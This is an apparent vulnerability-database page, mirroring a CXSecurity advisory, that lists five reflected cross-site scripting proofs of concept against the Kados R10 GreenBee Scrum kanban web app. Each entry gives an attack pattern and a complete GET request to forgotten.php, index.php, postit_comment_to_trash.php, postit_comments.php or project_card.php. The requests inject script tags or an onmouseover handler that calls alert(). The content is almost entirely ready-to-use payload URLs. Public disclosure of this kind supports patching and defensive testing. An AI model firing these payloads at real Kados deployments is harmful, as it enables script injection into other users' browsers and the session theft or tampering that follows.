Kados R10 GreenBee - Multiple XSS Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1570405 漏洞类型
发布时间 2019-04-15 更新时间 2019-04-15
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019040124
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
===========================================================================================
# Exploit Title: Kados R10 GreenBee - XSS Injection
# Dork: N/A
# Date: 06-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.kados.info/
# Software Link: https://sourceforge.net/projects/kados/
# Version: R10 GreenBee
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.
===========================================================================================
# POC - XSS
# Parameters : forgetten.php 
# Attack Pattern : '"--></style></scRipt><scRipt>alert(0x002C18)</scRipt> 
# GET Method : http://localhost/kados_r10/kados/forgotten.php?'"--></style></scRipt><scRipt>alert(0x002C18)</scRipt> 
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Kados R10 GreenBee - XSS Injection
# Dork: N/A
# Date: 06-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.kados.info/
# Software Link: https://sourceforge.net/projects/kados/
# Version: R10 GreenBee
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.
===========================================================================================
# POC - XSS
# Parameters : index.php
# Attack Pattern : '"--></style></scRipt><scRipt>alert(0x001D23)</scRipt>
# GET Method : http://localhost/kados_r10/kados/index.php/'"--></style></scRipt><scRipt>alert(0x001D23)</scRipt>  
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Kados R10 GreenBee - XSS Injection
# Dork: N/A
# Date: 06-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.kados.info/
# Software Link: https://sourceforge.net/projects/kados/
# Version: R10 GreenBee
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.
===========================================================================================
# POC - XSS
# Parameters : i,postit_comment_to_trash.php
# Attack Pattern : '"--></style></scRipt><scRipt>alert(0x00433D)</scRipt> 
# GET Method : http://localhost/kados_r10/kados/postit_comment_to_trash.php?i='"--></style></scRipt><scRipt>alert(0x00433D)</scRipt>   
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Kados R10 GreenBee - XSS Injection
# Dork: N/A
# Date: 06-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.kados.info/
# Software Link: https://sourceforge.net/projects/kados/
# Version: R10 GreenBee
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.
===========================================================================================
# POC - XSS
# Parameters : i,t,postit_comments.php
# Attack Pattern : x" onmouseover=alert(0x0027B0) x="&t=US
# GET Method : http://localhost/kados_r10/kados/postit_comments.php?i=x" onmouseover=alert(0x0027B0) x="&t=US    
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Kados R10 GreenBee - XSS Injection
# Dork: N/A
# Date: 06-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.kados.info/
# Software Link: https://sourceforge.net/projects/kados/
# Version: R10 GreenBee
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.
===========================================================================================
# POC - XSS
# Parameters : i,project_card.php
# Attack Pattern : '"--></style></scRipt><scRipt>alert(0x003817)</scRipt>
# GET Method : http://localhost/kados_r10/kados/project_card.php?i='"--></style></scRipt><scRipt>alert(0x003817)</scRipt>
===========================================================================================